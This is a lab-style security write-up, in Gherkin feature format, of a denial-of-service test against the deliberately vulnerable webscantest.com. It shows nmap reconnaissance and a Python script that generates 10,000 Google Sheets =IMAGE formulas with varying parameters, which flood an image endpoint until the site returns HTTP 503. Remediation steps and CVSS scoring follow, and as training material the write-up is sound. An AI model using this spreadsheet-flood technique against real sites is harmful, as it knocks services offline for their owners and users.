## Version 1.4.1
## language: en

Feature:
  TOE:
    Web Scanner Test Site
  Category:
    Denial of Service
  Location:
    http://webscantest.com/
  CWE:
    CWE-406: Insufficient Control of Network Message Volume
      https://cwe.mitre.org/data/definitions/406.html
    CWE-400: Uncontrolled Resource Consumption
      https://cwe.mitre.org/data/definitions/400.html
    CWE-664: Improper Control of a Resource Through its Lifetime
      https://cwe.mitre.org/data/definitions/664.html
  Rule:
    REQ.284: https://fluidattacks.com/web/rules/284/
    REQ.181: https://fluidattacks.com/web/rules/181/
  Goal:
    Shut down the page availability using goole spreadsheets image calls
  Recommendation:
    The connections of a client must be limited on the configuration files
    Whitelist mission-critical IPs and traffic sources
    Set up traffic alerts that notify of spikes and data floods
    Terminate unwanted connections
    Add more servers and bandwith to reduce the impact of the data flood
    Forbid or limit the resources requests from external parties

  Background:
  Hacker's software:
    | Name          | Version       |
    | Ubuntu        | 16.04         |
    | Firefox       | 72.0.02       |
    | nmap          | 7.01          |
  TOE information:
    Given I am accesing the webpage
    """
    http://webscantest.com/crosstraining/sitereviews.php
    """
    When I get site IP address using command "nslookup webscantest.com"
    """
    Server:     127.0.1.1
    Address:    127.0.1.1#53

    Non-authoritative answer:
    Name:    webscantest.com
    Address: 69.164.223.208
    """
    Then I can see the IP Address information
    When I run "nmap -sC -sV -oA nmap 69.164.223.208"
    Then I can see the webpage information
    And is runing on Ubuntu 14.04.2 LTS
    And is running Apache/2.4.7 (Ubuntu)
    And is powered by PHP/5.5.9

  Scenario: Normal use case
  Users can use the webapp to test multiple vulnerabilities
    When I load the main page
    Then I can see multiple vulnerability tests

  Scenario: Static detection
    Given I can't access to the source code
    Then I can't perform a static detection

  Scenario: Dynamic detection
    Given I seek on internet types of denial of service
    When I found is posible to make a DoS taking advantage of google function:
    """
    =IMAGE("URL")
    """
    Then I look for an image in the website and I found:
    """
    http://webscantest.com/datastore/getimage_by_id.php?id=3
    """
    When I try to request the image in Google spreadsheet using image function
    Then I can see the image is rendered and the request is a [success](1.png)
    And I can take advantage of this calling system to cause a DoS

  Scenario: Exploitation
    Given I can load images request in google spreadsheets
    When I notice google make a different request by adding a null parameter "p"
    """
    =IMAGE("http://webscantest.com/datastore/getimage_by_id.php?id=3&p=1")
    """
    Then I write a little script in python to write 10000 requests in a ".txt":
    """
    #Python code that write same link varying the p null parameter
    f = open("dos.txt","w+")
    for i in range(10000):
        f.write("=IMAGE(\"URL/getimage_by_id.php?id=3&p=%d\")\r\n" % (i+1))
    f.close()
    """
    When I copy and paste the "dos.txt" content into the google spreadsheet
    Then The spreadsheet start loading the images slowly
    But In some point it stops
    When I load "http://webscantest.com/" site
    Then I get a HTTP 503 response [evidence](2.png)
    And meaning site availability got compromised due to lack of traffic control

  Scenario: Remediation
    When the configuration of the resources and server are been stablished
    Then the requests a user or an IP can make are limited
    When I Set up traffic alerts that notify of spikes and data floods
    Then I can be aware of a Denial of Service Attack
    When I only whitelist important IP and traffic sources
    Then The server wont get overflood of unwanted requests
    When I forbid or limit the resources requests as images to external parties
    Then The webpage cant get exploited by the Google spreadsheets method

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.6/10 (High) - AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.1/10 (High) - E:F/RL:W/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    8.1/10 (High) - CR:M/IR:M/AR:M/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:N/MI:N/MA:H

  Scenario: Correlations
    No correlations have been found to this date 2020-05-13
